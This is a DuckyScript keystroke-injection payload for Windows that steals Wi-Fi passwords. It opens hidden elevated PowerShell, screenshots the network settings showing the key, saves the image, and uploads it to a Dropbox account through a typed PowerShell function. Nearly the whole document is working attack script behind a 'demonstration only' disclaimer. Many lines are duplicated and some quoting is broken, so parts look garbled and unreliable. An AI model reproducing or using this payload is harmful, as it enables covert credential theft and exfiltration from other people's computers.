Attacker, and Target devices.
REM Check out I am Jakoby on Youtube to set up your DropBox for uploads.
Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 1000
REM Stage 1
GUI r
DELAY 200
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
DELAY 1000
ENTER
DELAY 1000
ALT Y
DELAY 1000
GUI r
DELAY 1000
STRING control.exe /name Microsoft.NetworkAndSharingCenter
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
ENTER
DELAY 1000
CTRL TAB
DELAY 1000
TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
SHIFT TAB
DELAY 1000
REPEAT 6 SHIFT TAB
SPACE
DELAY 2000
PRINTSCREEN
DELAY 2000
ALT F4
DELAY 2000
ALT F4
DELAY 2000
ALT F4
DELAY 2000
REPEAT 3 ALT F4
REM STAGE 2
GUI r
DELAY 200
STRING powershell -windowstyle hidden
ENTER
DELAY 2000
STRING mspaint
ENTER
DELAY 5000
STRINGLN powershell -windowstyle hidden
STRINGLN mspaint
CTRL v
DELAY 1000
CTRL s
DELAY 1000
ALT d
DELAY 1000
STRING %USERPROFILE%\Downloads
DELAY 1000
ENTER
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 1000
STRINGLN %USERPROFILE%\Downloads
REPEAT 6 TAB
STRING wifipasswd
DELAY 1000
ALT s
DELAY 1000
ALT F4
DELAY 5000
STAGE 3
REM STAGE 3
GUI r
DELAY 200
STRING powershell
DELAY 200
ENTER
DELAY 2000
STRING function DropBox-Upload {
DELAY 500
ENTER
STRING [CmdletBinding()]
DELAY 500
ENTER
STRING param (
DELAY 500
ENTER
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
DELAY 500
ENTER
STRING [Alias("f")]
DELAY 500
ENTER
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRING }
DELAY 5000
STRINGLN powershell
STRINGLN function DropBox-Upload {
STRINGLN [CmdletBinding()]
STRINGLN param (
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRINGLN [string]$SourceFilePath
STRINGLN )
STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
STRINGLN "
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
STRINGLN $TargetFilePath="/$outputFile"
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
STRINGLN $headers.Add("Authorization", $authorization)
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRINGLN }
GUI r
DELAY 200
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 1000
STRINGLN %USERPROFILE%\Downloads\
STRINGLN wifipasswd
GUI r
DELAY 500
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRING wifipasswd
DELAY 500
STRINGLN %USERPROFILE%\Downloads\
STRINGLN wifipasswd
ALT h
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
REPEAT 5 TAB
ENTER
DELAY 500
ALT F4
DELAY 1000
CTRL v
DELAY 5000
STRING | DropBox-Upload
DELAY 500
ENTER
DELAY 5000
STRINGLN | DropBox-Upload
ENTER
ALT F4
DELAY 100
ENTER
ENTER